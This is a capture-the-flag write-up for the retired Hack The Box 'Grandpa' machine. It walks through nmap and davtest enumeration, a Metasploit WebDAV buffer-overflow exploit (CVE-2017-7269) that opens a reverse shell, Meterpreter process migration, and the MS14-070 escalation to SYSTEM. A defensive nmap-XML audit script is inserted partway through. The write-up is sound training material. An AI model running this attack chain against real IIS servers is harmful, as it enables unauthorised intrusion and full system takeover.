This is a writeup for the retired Hack The Box Grandpa machine.
- Hack The Box Machine address: https://www.hackthebox.com/machines/grandpa
- Machine IP: 10.10.10.14
- Time Required: 1 h
Solution summary
The Grandpa machine is an old Windows system running Microsoft IIS 6.0.
Exploit these two vulnerabilities to get the user and root flags:
- CVE-2017-7269, WebDAV buffer overflow: https://nvd.nist.gov/vuln/detail/cve-2017-7269
- CVE-2014-4076, TCP Input Output Control (IOCTL) privilege escalation: https://nvd.nist.gov/vuln/detail/CVE-2014-4076
Chaining the exploits needed for these two vulnerabilities is difficult. I recommend solving this machine using Metasploit to save yourself time that you can spend on other machines instead.
Solution
These are the steps needed to solve this machine:
- Map out the machine with Nmap and find exposed Microsoft IIS 6.0 with WebDAV.
- Find WebDAV vulnerabilities.
- Exploit the WebDAV buffer overflow with the Metasploit iis_webdav_scstoragepathfromurl exploit module.
- Post-exploit, leverage the TCP IOCTL privilege escalation Metasploit module ms14_070_tcpip_ioctl to become NT AUTHORITY\SYSTEM.
- Read out the flags.
Nmap
First, identify the exposed services on this machine:
nmap -sV -sC -A -oX machines/grandpa/nmap.xml 10.10.10.14
The results are:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-10 08:43 JST
Nmap scan report for 10.10.10.14
Host is up (0.083s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Mon, 09 Sep 2024 23:33:42 GMT
|_ Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 seconds
Findings:
Here are two things that stick out:
- Old Microsoft Internet Information Services (IIS) 6.0 web server running on TCP/80
- Same possible WebDAV vulnerability as in the Granny machine solved before.
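The scan above was saved with -oX, so the same two findings can be pulled out automatically. The following audit script is an added example (not part of the original writeup) that parses an nmap XML report, flags end-of-life IIS versions and lists the WebDAV write methods that the http-methods script reported; the embedded XML is a constructed sample shaped like the real scan result.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap -oX output, mirroring the scan results above.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.94">
  <host>
    <address addr="10.10.10.14" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Microsoft IIS httpd" version="6.0"/>
        <script id="http-methods" output="&#10;  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# WebDAV verbs that let a client create, change or delete content on the server.
WEBDAV_WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# IIS releases that no longer receive security updates (6.0 shipped with Windows Server 2003).
EOL_IIS_VERSIONS = {"5.0", "5.1", "6.0"}

def audit_nmap_xml(xml_text):
    """Return (host, port, finding) tuples for end-of-life IIS and writable WebDAV."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            portid = int(port.get("portid"))
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            if "IIS" in product and version in EOL_IIS_VERSIONS:
                findings.append((addr, portid, f"end-of-life web server: {product} {version}"))
            for script in port.iter("script"):
                if script.get("id") != "http-methods":
                    continue
                # nmap stores the script's text in the output attribute; pull the risky-methods line.
                m = re.search(r"Potentially risky methods:\s*(.+)", script.get("output", ""))
                risky = set(m.group(1).split()) if m else set()
                writable = sorted(risky & WEBDAV_WRITE_METHODS)
                if writable:
                    findings.append((addr, portid, "WebDAV write methods exposed: " + " ".join(writable)))
                if "TRACE" in risky:
                    findings.append((addr, portid, "TRACE enabled (cross-site tracing risk)"))
    return findings
```

Run it against the real report with `audit_nmap_xml(open("machines/grandpa/nmap.xml").read())`; every finding is one line an asset owner has to either patch or disable.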
WebDAV
[Figure: The landing page doesn't offer anything interesting]
To test whether arbitrary file uploads work in WebDAV, use the following davtest command:
davtest.pl -url http://10.10.10.14
davtest fails to upload any files and prints the following:
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: uj5EWcwWxxc9q
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT asp FAIL
PUT shtml FAIL
PUT pl FAIL
PUT cfm FAIL
PUT txt FAIL
PUT html FAIL
PUT aspx FAIL
PUT jhtml FAIL
PUT php FAIL
PUT cgi FAIL
PUT jsp FAIL
********************************************************
Metasploit
Since the davtest.pl upload approach didn't work, move on and try exploiting the next vulnerability, CVE-2017-7269.
Exploiting CVE-2017-7269 by hand is a bit tricky to pull off. Use Metasploit and save yourself a lot of heartache.
Run the following commands in msfconsole to run the exploit module and gain a reverse shell on the machine:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhosts 10.10.10.14
set lhost 10.10.16.6
set lport 4444
run
Inside Meterpreter, migrate to another process and put Meterpreter in the background.
meterpreter > ps
Process List
============
PID   PPID  Name          Arch  Session  User                          Path
---   ----  ----          ----  -------  ----                          ----
[...]
1956  584   wmiprvse.exe  x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
2096  392   vssvc.exe
2160  1484  w3wp.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
2228  584   davcdata.exe  x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
[...]
meterpreter > migrate 2160
[*] Migrating from 2280 to 2160...
[*] Migration completed successfully.
meterpreter > background
With Meterpreter in the background, prepare to exploit the next vulnerability and gain SYSTEM privileges in the next section.
Privilege escalation
The Meterpreter session is now running in the background. Use the TCP IOCTL exploit (CVE-2014-4076) to become the system user. This is the same exploit that solved the Granny machine before. Run the following:
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 1
This upgrades the session and you become NT AUTHORITY\SYSTEM. Run getuid to verify your current username:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Retrieving the flags
To search for the flag files on this machine you can use the search command in Meterpreter:
meterpreter > search -d "C:/Documents and Settings" -f *.txt
Found 14 results...
===================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
C:\Documents and Settings\Administrator\Desktop\root.txt 32 2017-04-12 23:29:33 +0900
[...]
C:\Documents and Settings\Harry\Desktop\user.txt 32 2017-04-12 23:32:26 +0900
[...]
Print out the flags using the cat command:
meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
meterpreter > cat 'C:\Documents and Settings\Harry\Desktop\user.txt'
The flags are:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX